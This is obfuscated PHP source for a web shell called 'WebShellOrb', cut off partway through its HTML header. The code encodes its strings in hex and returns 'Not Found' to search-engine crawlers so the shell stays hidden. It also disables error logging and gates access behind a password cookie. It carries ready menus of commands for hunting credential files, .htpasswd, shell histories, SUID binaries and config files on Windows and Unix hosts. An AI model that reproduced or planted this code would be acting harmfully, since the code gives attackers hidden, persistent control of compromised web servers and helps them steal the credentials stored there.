${"G\x4c\x4f\x42\x41\x4c\x53"}["\x63\x78f\x62\x79fx\x61\x6a\x74"] = "\x61";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x70\x75nnqn\x73\x77\x79"] = "\x67\x72";
${"\x47L\x4fB\x41\x4c\x53"}["z\x70p\x7a\x63\x73\x66go"] = "o\x77";
${"\x47\x4cO\x42A\x4c\x53"}["\x71\x61n\x68u\x6f"] = "di\x72Co\x6ete\x6e\x74";
${"G\x4c\x4fBALS"}["\x78\x7a\x6fcq\x72o\x65\x73t\x73\x70"] = "\x64i\x72\x73";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x6bh\x74k\x62t\x62\x63p"] = "\x6d\x61\x74\x63h";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x78\x66\x6c\x72\x6b\x67\x68\x67"] = "s\x6f\x72\x74";
${"\x47\x4c\x4f\x42\x41L\x53"}["o\x6f\x63\x77\x61b\x6f"] = "\x6b\x65\x79";
${"G\x4c\x4f\x42ALS"}["x\x71\x6a\x63y\x6a\x66\x66\x69"] = "i\x74er\x61\x74\x6fr";
${"GL\x4f\x42\x41\x4cS"}["\x61\x69\x68x\x74\x67u\x6a"] = "h";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x73\x6d\x63bg\x63\x79\x69"] = "\x64";
${"\x47L\x4f\x42\x41LS"}["\x73\x62u\x77\x77\x6b\x6fz\x74"] = "\x63";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76x\x68\x64\x6f\x69\x68ql\x6bd"] = "\x74\x79\x70\x65";
${"\x47\x4cO\x42AL\x53"}["\x65\x63b\x63\x6d\x69y\x62\x75\x65"] = "\x74\x6dp";
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x70\x68g\x6a\x79\x74x"] = "\x64\x61\x6eg\x65r";
${"\x47\x4c\x4fB\x41L\x53"}["m\x65\x72c\x67md\x77e"] = "\x74\x65mp";
${"\x47L\x4f\x42\x41\x4cS"}["o\x6e\x6d\x64\x72\x78"] = "\x6e";
${"\x47\x4c\x4fB\x41LS"}["y\x6cu\x78e\x63l\x6c"] = "f\x69les";
${"G\x4cO\x42\x41L\x53"}["r\x62\x61\x73qp"] = "\x66\x69len\x61m\x65";
${"G\x4cO\x42\x41\x4c\x53"}["q\x75\x62w\x6bb"] = "\x64\x68";
${"G\x4c\x4fBA\x4cS"}["\x6ceu\x77\x75\x6d\x74"] = "di\x72";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["vwhnm\x76\x62\x7a\x6d\x75qd"] = "p";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x75\x6fp\x75\x70g\x79"] = "\x73";
${"\x47\x4c\x4f\x42\x41L\x53"}["\x73\x62e\x72\x6c\x67"] = "f";
${"G\x4c\x4f\x42\x41\x4cS"}["\x66nkk\x64\x74gr"] = "\x69\x6e";
${"\x47\x4c\x4fBA\x4cS"}["\x71\x64\x75\x72\x71\x6d\x71jm\x62r"] = "\x6f\x75t";
${"\x47L\x4f\x42\x41\x4c\x53"}["b\x72v\x6a\x6d\x65"] = "\x69\x73_\x77\x72\x69\x74a\x62l\x65";
${"\x47LO\x42\x41\x4c\x53"}["p\x6c\x79\x75\x6chi\x75r\x6f"] = "\x66\x72\x65\x65\x53\x70\x61\x63\x65";
${"\x47L\x4f\x42A\x4c\x53"}["\x63bl\x77\x73\x66\x73\x72\x78\x64w"] = "dr\x69\x76\x65";
${"\x47L\x4f\x42A\x4cS"}["\x6ff\x68w\x73m\x6d\x6d"] = "d\x72\x69\x76e\x73";
${"\x47L\x4fBA\x4cS"}["\x76v\x64x\x6d\x6a\x62g\x65\x63"] = "\x76";
${"\x47\x4cO\x42\x41\x4cS"}["\x77\x77\x74f\x67\x63\x64d\x66"] = "m\x65\x6e\x75";
${"G\x4c\x4fBA\x4c\x53"}["\x66s\x6bqow\x79\x6f\x76\x70\x6b"] = "\x6d";
${"G\x4c\x4fBAL\x53"}["\x62d\x6dq\x77\x71v\x66q\x6e"] = "\x69t\x65\x6d";
${"\x47\x4c\x4fBALS"}["m\x67\x76\x6b\x78\x67c\x6d\x6ffyr"] = "\x6f\x70\x74\x5f\x63\x68\x61\x72\x73\x65\x74s";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66\x66s\x77l\x68\x61\x62"] = "\x70a\x74\x68";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x78\x67t\x64d\x73\x7aw\x71\x6er"] = "\x6a";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x6c\x6bu\x79o\x6a\x6a"] = "\x69";
${"\x47L\x4f\x42A\x4c\x53"}["qu\x6d\x72\x63ez"] = "\x63\x77\x64\x5f\x6c\x69\x6eks";
${"\x47\x4cO\x42A\x4cS"}["g\x6b\x6a\x79rzx\x6eg"] = "\x75id";
${"GL\x4f\x42A\x4c\x53"}["\x68xh\x66\x62\x66\x6c\x68\x7alt"] = "\x75\x73e\x72";
${"\x47\x4cOB\x41\x4c\x53"}["\x75\x79r\x7afu\x62j\x6c"] = "gr\x6f\x75\x70";
${"\x47L\x4fBA\x4c\x53"}["\x65\x6c\x6b\x79\x78\x6diy\x75"] = "\x67\x69d";
${"\x47L\x4fBA\x4c\x53"}["\x63\x63oxzyjv"] = "\x72\x65\x6cea\x73\x65";
${"G\x4c\x4f\x42\x41\x4c\x53"}["b\x78y\x6f\x79tp\x72\x64"] = "\x65x\x70l\x69n\x6b";
${"\x47\x4c\x4f\x42\x41L\x53"}["v\x67\x6b\x6f\x6ei\x7a\x71"] = "\x6b\x65\x72n\x65\x6c";
${"G\x4c\x4fB\x41L\x53"}["\x6d\x74\x6d\x63\x67\x62\x75xs\x74\x6a"] = "\x74\x6ft\x61\x6c\x53\x70\x61\x63\x65";
${"G\x4c\x4f\x42A\x4cS"}["u\x6f\x6cb\x79j\x63o\x77\x75\x75m"] = "\x61\x6c\x69\x61\x73\x65s";
${"\x47\x4cO\x42A\x4c\x53"}["\x72\x71\x6c\x72\x76\x72q\x6ad\x79e"] = "\x63w\x64";
${"\x47L\x4fBA\x4cS"}["p\x70\x79\x78s\x62\x73\x73m"] = "hom\x65\x5f\x63w\x64";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x63\x70x\x73\x6e\x68fr\x76\x78\x6e\x72"] = "sa\x66e\x5fm\x6f\x64\x65";
${"\x47L\x4f\x42\x41\x4c\x53"}["t\x6e\x67pl\x62ofy\x66xj"] = "\x6f\x73";
$slswzwwiy = "\x6f\x73";
$qvuswnnljk = "\x63\x77\x64";
${"\x47L\x4f\x42\x41\x4cS"}["o\x71\x76\x72\x79xe"] = "k";
${"G\x4c\x4f\x42\x41L\x53"}["\x65\x67\x63\x6e\x79\x6d\x75\x6ak\x69u"] = "a\x72\x72a\x79";
${"\x47\x4cO\x42\x41L\x53"}["\x64\x62\x64zn\x6a\x67\x78v"] = "\x75s\x65r\x41\x67e\x6e\x74\x73";
${"\x47LO\x42A\x4cS"}["\x63\x64\x6b\x70\x61\x72\x6e\x64\x6fqp"] = "\x61\x75\x74\x68_pass";
${"\x47LO\x42\x41LS"}["w\x71\x6erz\x76"] = "de\x66a\x75\x6c\x74_\x75\x73e\x5f\x61j\x61\x78";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63\x6e\x72eqx\x78\x78\x79x"] = "c\x6fl\x6fr";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x76n\x76\x75\x65\x70"] = "\x6f\x73";
error_reporting(0);
$rcnyvpgwp = "\x64\x65f\x61ult\x5f\x61ct\x69o\x6e";
${${"\x47L\x4f\x42\x41\x4cS"}["\x63nreqx\x78\x78\x79\x78"]} = "#d\x66\x35";
${$rcnyvpgwp} = "\x46i\x6ces\x4d\x61n";
${${"G\x4c\x4fB\x41L\x53"}["\x77\x71\x6e\x72z\x76"]} = true;
${"\x47\x4cOB\x41L\x53"}["\x68x\x77o\x77\x69\x78k\x63a\x68"] = "di\x73a\x62le\x5f\x66\x75\x6e\x63\x74i\x6f\x6e\x73";
${"\x47\x4c\x4f\x42AL\x53"}["\x6f\x65\x63\x79\x69\x7a\x77\x64\x67"] = "\x64\x65\x66\x61u\x6ct\x5f\x63\x68\x61rs\x65\x74";
${${"\x47\x4cO\x42A\x4cS"}["\x6fe\x63\x79\x69\x7a\x77\x64\x67"]} = "W\x69\x6e\x64\x6fw\x73-1\x32\x35\x31";
${${"\x47L\x4f\x42AL\x53"}["\x63d\x6b\x70\x61\x72\x6ed\x6f\x71\x70"]} = "";
if (!empty($_SERVER["H\x54\x54P\x5f\x55S\x45R\x5f\x41\x47EN\x54"])) {
$funwst = "\x75s\x65\x72A\x67\x65\x6ets";
${$funwst} = array(
"G\x6f\x6fgl\x65",
"S\x6c\x75\x72\x70",
"M\x53N\x42ot",
"\x69a_\x61rc\x68i\x76er",
"\x59\x61\x6e\x64e\x78",
"\x52\x61mb\x6cer"
);
if (preg_match("/" . implode("|", ${${"GL\x4f\x42\x41\x4c\x53"}["\x64\x62\x64\x7a\x6ejg\x78\x76"]}) . "/\x69", $_SERVER["\x48\x54TP\x5fUSE\x52_\x41\x47\x45N\x54"])) {
header("\x48TTP/\x31\x2e0\x20\x340\x34\x20Not Fo\x75\x6e\x64");
exit;
}
}
@ini_set("e\x72\x72or_\x6cog", NULL);
@ini_set("lo\x67\x5fer\x72ors", 0);
@ini_set("\x6d\x61\x78\x5f\x65xe\x63\x75tio\x6e\x5ftime", 0);
$jkanbtmrlf = "a\x75\x74h\x5f\x70\x61\x73s";
@set_time_limit(0);
$iqvdvclroyby = "a\x6ci\x61s\x65\x73";
@define("Web\x53\x68e\x6cl\x4f\x72b\x5fV\x45R\x53IO\x4e", "\x32.6");
if (get_magic_quotes_gpc()) {
function WebShellOrbstripslashes($array)
{
${"G\x4cO\x42\x41\x4cS"}["\x6a\x64\x63u\x75\x72k\x71"] = "a\x72\x72ay";
$ziszkiem = "\x61\x72\x72\x61\x79";
return is_array(${${"G\x4cOB\x41\x4cS"}["egc\x6e\x79\x6d\x75\x6ak\x69u"]}) ? array_map("\x57eb\x53h\x65ll\x4fr\x62st\x72\x69p\x73\x6ca\x73hes", ${$ziszkiem}) : stripslashes(${${"\x47L\x4fB\x41\x4c\x53"}["\x6ad\x63\x75\x75\x72\x6b\x71"]});
}
$_POST = WebShellOrbstripslashes($_POST);
$_COOKIE = WebShellOrbstripslashes($_COOKIE);
}
function WebShellOrbLogin()
{
die("\x3c\x70\x72e\x20\x61\x6c\x69\x67\x6e\x3dc\x65n\x74er\x3e\x3cfo\x72\x6d\x20me\x74\x68od=p\x6f\x73\x74\x3ePas\x73\x77ord:\x20<i\x6e\x70\x75\x74 \x74\x79\x70\x65\x3dp\x61\x73swo\x72d\x20\x6e\x61\x6de=\x70\x61\x73\x73>\x3c\x69\x6epu\x74 t\x79p\x65=\x73u\x62\x6di\x74 \x76a\x6c\x75e\x3d'>>'>\x3c/\x66o\x72\x6d\x3e\x3c/pre\x3e");
}
function WebShellOrbsetcookie($k, $v)
{
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x69n\x62\x63\x66\x64m\x6c"] = "\x6b";
$gltqybwss = "\x76";
$_COOKIE[${${"\x47\x4cO\x42\x41\x4cS"}["\x69n\x62cf\x64\x6d\x6c"]}] = ${$gltqybwss};
${"\x47\x4c\x4f\x42AL\x53"}["\x6c\x69\x79\x72\x7a\x67gw\x69"] = "\x76";
setcookie(${${"\x47LO\x42\x41\x4c\x53"}["\x6fqvryx\x65"]}, ${${"\x47\x4c\x4fB\x41LS"}["\x6ci\x79\x72\x7ag\x67w\x69"]});
}
if (!empty(${$jkanbtmrlf})) {
$mewlffwp = "a\x75\x74\x68\x5f\x70\x61\x73s";
${"\x47L\x4f\x42A\x4c\x53"}["\x63\x63\x72\x72e\x63jg\x6dg"] = "au\x74\x68\x5f\x70\x61ss";
${"\x47L\x4f\x42A\x4c\x53"}["\x75w\x6c\x6ex\x6eq\x6b\x76\x79\x78"] = "a\x75\x74h\x5f\x70\x61\x73\x73";
if (isset($_POST["\x70\x61\x73s"]) && (md5($_POST["pa\x73\x73"]) == ${${"\x47\x4c\x4f\x42\x41LS"}["u\x77\x6c\x6e\x78\x6e\x71\x6b\x76\x79x"]}))
WebShellOrbsetcookie(md5($_SERVER["\x48\x54TP\x5f\x48OS\x54"]), ${$mewlffwp});
if (!isset($_COOKIE[md5($_SERVER["\x48TT\x50_\x48\x4fS\x54"])]) || ($_COOKIE[md5($_SERVER["H\x54\x54P_\x48\x4fS\x54"])] != ${${"\x47\x4c\x4f\x42A\x4cS"}["\x63cr\x72\x65\x63\x6a\x67\x6d\x67"]}))
WebShellOrbLogin();
}
if (strtolower(substr(PHP_OS, 0, 3)) == "\x77i\x6e")
${${"G\x4c\x4f\x42A\x4c\x53"}["\x76\x6e\x76u\x65\x70"]} = "\x77\x69\x6e";
else
${${"\x47L\x4f\x42A\x4cS"}["t\x6eg\x70l\x62\x6ff\x79\x66\x78j"]} = "ni\x78";
${${"GL\x4f\x42\x41LS"}["\x63\x70\x78\x73\x6e\x68\x66\x72\x76\x78\x6e\x72"]} = @ini_get("safe\x5f\x6d\x6f\x64e");
if (!${${"\x47\x4c\x4f\x42\x41L\x53"}["\x63\x70x\x73n\x68\x66r\x76\x78\x6er"]})
error_reporting(0);
${${"\x47LO\x42\x41L\x53"}["hxwo\x77i\x78kc\x61h"]} = @ini_get("\x64isa\x62le\x5ff\x75n\x63\x74ion\x73");
${${"GLO\x42\x41\x4c\x53"}["p\x70\x79\x78\x73\x62s\x73m"]} = @getcwd();
if (isset($_POST["\x63"]))
@chdir($_POST["\x63"]);
${${"G\x4c\x4f\x42\x41\x4cS"}["\x72q\x6c\x72vr\x71\x6ad\x79\x65"]} = @getcwd();
if (${$slswzwwiy} == "\x77\x69n") {
${${"\x47\x4c\x4f\x42AL\x53"}["pp\x79\x78s\x62s\x73\x6d"]} = str_replace("\x5c", "/", ${${"\x47\x4cO\x42\x41L\x53"}["\x70\x70\x79\x78\x73\x62\x73sm"]});
$sjfvibvmk = "\x63\x77\x64";
${$sjfvibvmk} = str_replace("\\", "/", ${${"G\x4cO\x42AL\x53"}["\x72\x71lrv\x72\x71\x6ady\x65"]});
}
${"\x47LOBA\x4cS"}["\x77\x6dcg\x63\x67\x75\x71"] = "\x6fs";
if (${$qvuswnnljk}[strlen(${${"G\x4c\x4f\x42\x41\x4c\x53"}["r\x71\x6c\x72\x76\x72\x71\x6a\x64\x79\x65"]}) - 1] != "/")
${${"\x47L\x4fB\x41L\x53"}["\x72\x71\x6c\x72vrqj\x64\x79\x65"]} .= "/";
if (!isset($_COOKIE[md5($_SERVER["\x48\x54TP_\x48O\x53T"]) . "\x61\x6aax"]))
$_COOKIE[md5($_SERVER["H\x54TP\x5f\x48OST"]) . "\x61\x6a\x61\x78"] = (bool) ${${"\x47\x4c\x4f\x42\x41LS"}["\x77qn\x72\x7a\x76"]};
if (${${"\x47LO\x42\x41\x4cS"}["\x77\x6dc\x67\x63\x67\x75\x71"]} == "\x77\x69\x6e")
${${"\x47\x4c\x4fB\x41\x4cS"}["\x75o\x6c\x62\x79\x6a\x63\x6fw\x75\x75m"]} = array(
"Li\x73t Di\x72ect\x6fry" => "dir",
"Fin\x64\x20\x69n\x64\x65\x78\x2e\x70\x68p\x20\x69n\x20\x63\x75r\x72\x65\x6e\x74 \x64\x69\x72" => "d\x69r /s\x20/\x77 /\x62\x20\x69\x6e\x64ex.p\x68\x70",
"F\x69n\x64\x20*co\x6efig*.\x70\x68p \x69\x6e\x20\x63ur\x72\x65\x6et dir" => "di\x72 /s\x20/w\x20/b\x20*\x63onf\x69\x67*.ph\x70",
"\x53\x68\x6f\x77 a\x63\x74i\x76e \x63onnectio\x6es" => "\x6ee\x74\x73t\x61t\x20-an",
"S\x68o\x77\x20\x72un\x6e\x69ng\x20\x73\x65r\x76i\x63\x65\x73" => "n\x65t\x20s\x74\x61rt",
"User a\x63\x63o\x75\x6e\x74s" => "\x6eet\x20\x75\x73e\x72",
"\x53how com\x70u\x74\x65rs" => "net \x76i\x65\x77",
"ARP \x54\x61ble" => "ar\x70 -\x61",
"\x49P \x43on\x66\x69gura\x74\x69\x6fn" => "\x69pco\x6ef\x69\x67\x20/\x61ll"
);
else
${$iqvdvclroyby} = array(
"\x4c\x69st\x20\x64i\x72" => "ls\x20-\x6cha",
"\x6ci\x73t \x66il\x65 \x61\x74\x74r\x69but\x65s \x6f\x6e\x20a\x20L\x69\x6e\x75x\x20s\x65\x63ond e\x78\x74\x65nd\x65d\x20\x66\x69le syste\x6d" => "l\x73\x61\x74\x74\x72\x20-\x76\x61",
"sh\x6f\x77 \x6f\x70e\x6e\x65d\x20\x70or\x74\x73" => "\x6e\x65ts\x74a\x74\x20-\x61\x6e |\x20\x67re\x70 -i\x20\x6c\x69\x73te\x6e",
"\x70\x72oc\x65\x73\x73 \x73ta\x74us" => "ps \x61u\x78",
"F\x69n\x64" => "",
"\x66i\x6e\x64 a\x6cl \x73\x75id" => "find\x20/ -ty\x70e\x20f -\x70\x65\x72\x6d\x20-\x304\x30\x300 -\x6c\x73",
"\x66in\x64\x20\x73\x75i\x64 i\x6e\x20curre\x6e\x74 \x64\x69r" => "\x66\x69n\x64 .\x20-t\x79\x70e\x20f\x20-\x70\x65r\x6d\x20-0\x34000\x20-\x6c\x73",
"\x66\x69\x6ed \x61ll\x20\x73\x67\x69\x64" => "\x66\x69nd\x20/ -t\x79\x70\x65 f\x20-\x70e\x72m\x20-\x30\x320\x30\x30\x20-\x6c\x73",
"\x66\x69n\x64\x20\x73\x67id \x66il\x65\x73 \x69\x6e\x20cu\x72r\x65n\x74 dir" => "\x66\x69\x6ed \x2e -ty\x70\x65 f -per\x6d\x20-\x30\x32000 -l\x73",
"\x66i\x6ed c\x6fn\x66\x69\x67.i\x6e\x63\x2ephp" => "f\x69\x6e\x64 / -\x74y\x70e \x66\x20-\x6e\x61m\x65 \x63on\x66\x69\x67.in\x63\x2e\x70hp",
"f\x69nd\x20conf\x69g*" => "f\x69\x6e\x64 / -\x74\x79\x70\x65 f -na\x6de\x20\"\x63o\x6e\x66ig*\x22",
"\x66ind c\x6f\x6efig*\x20\x69\x6e\x20\x63urre\x6et\x20\x64\x69\x72" => "\x66\x69\x6ed\x20.\x20-\x74ype f\x20-na\x6de \"config*\x22",
"fi\x6ed\x20al\x6c\x20\x77\x72ita\x62le\x20\x66o\x6c\x64\x65\x72\x73\x20and\x20fi\x6c\x65\x73" => "\x66ind\x20/\x20-\x70\x65\x72\x6d\x20-\x32 -ls",
"find\x20\x61\x6cl w\x72\x69\x74a\x62\x6ce\x20\x66ol\x64\x65rs\x20and fi\x6ces \x69\x6e\x20\x63\x75\x72\x72\x65\x6e\x74\x20\x64i\x72" => "\x66ind \x2e\x20-\x70er\x6d\x20-\x32 -ls",
"f\x69\x6e\x64 a\x6cl\x20s\x65rvice.\x70\x77\x64" => "\x66\x69n\x64\x20/\x20-\x74yp\x65 \x66 -n\x61m\x65\x20\x73e\x72v\x69\x63e\x2e\x70wd",
"f\x69\x6e\x64\x20s\x65r\x76i\x63\x65.\x70wd\x20fil\x65\x73 i\x6e\x20\x63\x75rre\x6et \x64ir" => "\x66\x69\x6ed\x20\x2e\x20-\x74\x79\x70\x65\x20f\x20-n\x61\x6de \x73\x65rv\x69\x63e.p\x77\x64",
"f\x69\x6ed a\x6cl\x20\x2eh\x74\x70assw\x64" => "f\x69\x6ed\x20/\x20-t\x79\x70e\x20f -nam\x65 .ht\x70assw\x64",
"f\x69n\x64\x20\x2eh\x74pas\x73wd\x20f\x69les\x20i\x6e curre\x6e\x74\x20d\x69r" => "f\x69nd .\x20-\x74\x79pe f -na\x6de \x2ehtp\x61ss\x77d",
"fin\x64\x20\x61ll \x2e\x62as\x68\x5fhis\x74\x6f\x72y" => "fi\x6e\x64\x20/ -t\x79\x70\x65\x20f -na\x6d\x65\x20\x2eb\x61sh_\x68i\x73t\x6f\x72y",
"\x66\x69\x6ed\x20\x2e\x62\x61sh\x5fhisto\x72y\x20fi\x6c\x65s\x20i\x6e\x20cu\x72\x72en\x74 \x64\x69\x72" => "fin\x64 .\x20-\x74\x79pe\x20f\x20-n\x61me\x20.ba\x73h_his\x74\x6f\x72\x79",
"\x66i\x6e\x64 al\x6c\x20\x2efetch\x6d\x61ilr\x63" => "f\x69\x6e\x64\x20/ -\x74\x79\x70e\x20f\x20-nam\x65 .\x66etc\x68m\x61i\x6c\x72c",
"find\x20\x2efet\x63hm\x61\x69l\x72c\x20f\x69\x6c\x65\x73\x20\x69\x6e curr\x65\x6et\x20d\x69r" => "\x66in\x64 . -t\x79\x70e \x66 -name\x20\x2ef\x65\x74chm\x61i\x6c\x72\x63",
"Locate" => "",
"loca\x74e h\x74\x74\x70\x64.\x63o\x6ef" => "loc\x61\x74e\x20\x68\x74t\x70\x64\x2e\x63o\x6e\x66",
"lo\x63a\x74e\x20\x76\x68os\x74s\x2e\x63\x6f\x6ef" => "\x6c\x6f\x63\x61\x74\x65\x20vho\x73\x74s\x2ec\x6fn\x66",
"\x6co\x63\x61te\x20\x70r\x6fft\x70\x64\x2ec\x6fnf" => "\x6cocate\x20\x70\x72\x6f\x66tp\x64.con\x66",
"l\x6f\x63ate p\x73\x79\x62\x6e\x63.\x63\x6f\x6ef" => "\x6c\x6fc\x61t\x65 \x70\x73\x79\x62nc.\x63o\x6ef",
"\x6coc\x61\x74e\x20my.c\x6f\x6e\x66" => "l\x6f\x63ate\x20my\x2e\x63on\x66",
"l\x6fc\x61t\x65\x20a\x64m\x69n\x2eph\x70" => "\x6co\x63at\x65\x20ad\x6d\x69\x6e.p\x68p",
"lo\x63\x61t\x65\x20\x63fg.\x70hp" => "\x6coc\x61te\x20\x63fg\x2e\x70\x68\x70",
"\x6cocate\x20\x63\x6fnf.p\x68p" => "\x6c\x6f\x63\x61\x74\x65\x20\x63on\x66.p\x68\x70",
"\x6cocate\x20\x63\x6f\x6ef\x69g.dat" => "l\x6fc\x61te \x63onf\x69g.\x64\x61t",
"\x6c\x6fcate\x20\x63o\x6efig\x2e\x70h\x70" => "l\x6fca\x74e c\x6f\x6ef\x69g\x2e\x70hp",
"lo\x63a\x74\x65 \x63\x6f\x6e\x66\x69g\x2e\x69nc" => "l\x6fcat\x65 \x63o\x6e\x66ig\x2e\x69n\x63",
"\x6c\x6fc\x61\x74e con\x66\x69\x67.in\x63\x2e\x70\x68\x70" => "l\x6fc\x61\x74e\x20\x63onf\x69\x67.i\x6e\x63.php",
"lo\x63\x61\x74\x65 \x63on\x66\x69\x67.\x64\x65fau\x6c\x74.p\x68\x70" => "loc\x61\x74e \x63o\x6ef\x69g.\x64\x65\x66a\x75\x6ct\x2eph\x70",
"l\x6fc\x61te\x20\x63\x6fnfig*" => "\x6c\x6fc\x61t\x65\x20\x63\x6f\x6efig",
"\x6c\x6fc\x61\x74\x65\x20\x2e\x63\x6fnf" => "\x6cocat\x65 \x27.\x63o\x6ef\x27",
"\x6co\x63\x61\x74e\x20.\x70w\x64" => "lo\x63\x61te '.\x70w\x64'",
"l\x6f\x63at\x65 .\x73ql" => "\x6coc\x61te \x27.\x73q\x6c\x27",
"\x6co\x63\x61\x74e .\x68\x74p\x61\x73\x73wd" => "\x6c\x6fc\x61t\x65\x20\x27\x2e\x68\x74pa\x73\x73\x77\x64\x27",
"locat\x65\x20.\x62as\x68\x5fh\x69\x73to\x72\x79" => "l\x6fc\x61t\x65 \x27\x2ebas\x68_h\x69\x73t\x6f\x72y'",
"l\x6fcate\x20.\x6dy\x73q\x6c_\x68\x69\x73t\x6fr\x79" => "\x6c\x6fca\x74\x65\x20\x27\x2emy\x73ql_\x68\x69stor\x79\x27",
"l\x6fc\x61t\x65 \x2e\x66\x65\x74c\x68\x6da\x69l\x72\x63" => "\x6co\x63\x61t\x65 '\x2efe\x74ch\x6dail\x72c'",
"\x6c\x6fc\x61t\x65 ba\x63\x6bup" => "\x6co\x63ate\x20\x62ac\x6b\x75p",
"l\x6f\x63\x61t\x65\x20\x64u\x6dp" => "\x6co\x63ate \x64um\x70",
"\x6c\x6f\x63a\x74\x65\x20p\x72\x69v" => "l\x6fca\x74\x65 pri\x76"
);
function WebShellOrbHeader()
{
${"\x47\x4c\x4fB\x41\x4cS"}["lf\x63\x64\x68\x78\x69\x71\x72ju\x63"] = "\x66\x72\x65\x65\x53p\x61ce";
$cvyfemar = "\x69";
$gigkkylcom = "v";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["r\x74\x7ag\x76\x69w"] = "i\x74\x65\x6d";
$jeuwvfj = "pa\x74h";
$syynptc = "\x75\x69\x64";
$unibgzq = "\x72\x65\x6ceas\x65";
${"G\x4cO\x42A\x4c\x53"}["q\x68\x67\x6e\x6c\x6aw\x73"] = "\x74\x6f\x74\x61\x6cSp\x61\x63\x65";
if (empty($_POST["char\x73et"]))
$_POST["ch\x61\x72\x73e\x74"] = $GLOBALS["\x64e\x66au\x6ct\x5fc\x68a\x72set"];
${"GLO\x42\x41LS"}["\x70aa\x6cly\x77\x6b\x69"] = "e\x78pl\x69\x6ek";
$unjshhsygx = "\x69\x74e\x6d";
${"\x47\x4c\x4f\x42A\x4c\x53"}["\x72rs\x61\x79\x65o\x76"] = "\x6b";
${"G\x4cO\x42\x41\x4cS"}["\x74\x6c\x6dq\x79\x73bj"] = "u\x73\x65r";
$mzcbhnv = "\x6e";
global $color;
$ylknujmswar = "\x63\x68a\x72\x73ets";
$fnmpbhsrxkxs = "\x72\x65\x6ce\x61s\x65";
echo "<h\x74\x6dl\x3e<he\x61d\x3e\x3cme\x74\x61\x20h\x74\x74p-e\x71\x75i\x76=\x27Co\x6et\x65n\x74-\x54ype'\x20\x63\x6fn\x74e\x6e\x74\x3d'\x74\x65\x78t/\x68tml; ch\x61rse\x74=" . $_POST["charse\x74"] . "\x27\x3e<titl\x65\x3e" . $_SERVER["\x48TTP\x5f\x48OS\x54"] . "\x20- \x57e\x62\x53he\x6cl\x4f\x72b\x20" . WebShellOrb_VERSION . "\x3c/\x74\x69\x74\x6ce\x3e\n\x3cs\x74\x79l\x65>\nb\x6f\x64\x79{\x62a\x63\x6b\x67\x72oun\x64-\x63\x6fl\x6f\x72:\x23444\x3b\x63\x6flo\x72:\x23e1e1\x65\x31\x3b}\n\x62od\x79,t\x64,\x74h{\x20\x66o\x6e\x74:\x209pt\x20L\x75\x63i\x64a,Ver\x64\x61\x6e\x61;ma\x72\x67in:\x30\x3bvertica\x6c-\x61\x6cign:t\x6f\x70;\x63o\x6c\x6f\x72:\x23\x65\x31\x65\x31\x651\x3b\x20}\n\x74\x61\x62l\x65.\x69\x6efo{\x20co\x6c\x6fr:#f\x66\x66;b\x61c\x6bgrou\x6ed-\x63\x6f\x6cor:\x232\x322; }\nspan,\x68\x31,\x61{\x20\x63\x6fl\x6f\x72: $color !\x69mp\x6frtant; }\nspan{ f\x6f\x6e\x74-\x77e\x69g\x68t:\x20\x62o\x6cde\x72\x3b }\n\x68\x31{\x20border-l\x65f\x74:\x35px s\x6fli\x64 $color\x3b\x70a\x64di\x6eg:\x202\x70\x78 \x35\x70x;f\x6fn\x74:\x20\x314pt \x56e\x72da\x6e\x61\x3bb\x61ckg\x72\x6fu\x6e\x64-\x63\x6f\x6c\x6f\x72:#222;m\x61\x72g\x69n:0px\x3b\x20}\ndiv\x2e\x63o\x6ete\x6e\x74{ \x70\x61\x64di\x6e\x67: \x35p\x78\x3bm\x61\x72\x67i\x6e-\x6c\x65ft:\x35p\x78\x3bba\x63k\x67r\x6fund-\x63ol\x6fr:#3\x33\x33; }\na{ tex\x74-\x64\x65c\x6fra\x74io\x6e:\x6eon\x65;\x20}\na:hov\x65\x72{\x20\x74e\x78\x74-dec\x6fr\x61tion:un\x64e\x72\x6ci\x6ee\x3b\x20}\n\x2em\x6c\x31{ bo\x72\x64er:1p\x78 s\x6fl\x69\x64\x20\x2344\x34;padd\x69ng:\x35p\x78\x3b\x6d\x61\x72\x67in:\x30;\x6fv\x65r\x66\x6c\x6fw:\x20\x61u\x74o\x3b }\n.\x62\x69\x67\x61\x72\x65a{ wi\x64th:1\x30\x30\x25\x3b\x68e\x69ght:\x33\x300\x70\x78\x3b }\n\x69n\x70\x75t,tex\x74\x61\x72\x65\x61,sele\x63t{ \x6dar\x67i\x6e:\x30\x3b\x63\x6fl\x6f\x72:\x23\x66ff\x3bb\x61\x63\x6bgro\x75nd-\x63olor:#\x3555;\x62o\x72\x64e\x72:\x31\x70\x78\x20so\x6c\x69d\x20$color;\x20\x66o\x6e\x74:\x209\x70\x74\x20M\x6fn\x6f\x73\x70\x61\x63\x65,'C\x6f\x75\x72\x69\x65r\x20N\x65w\x27; }\nform{\x20m\x61rgin:\x30px\x3b\x20}\n#t\x6fo\x6c\x73T\x62l{\x20text-\x61\x6cign:\x63en\x74\x65\x72;\x20}\n\x2et\x6f\x6flsInp{ \x77i\x64t\x68:\x203\x30\x30\x70\x78\x20}\n\x2em\x61\x69\x6e \x74\x68{t\x65x\x74-\x61l\x69\x67\x6e:\x6c\x65f\x74\x3bb\x61\x63\x6bgrou\x6e\x64-co\x6c\x6f\x72:\x235\x655e\x35\x65\x3b}\n.\x6da\x69n 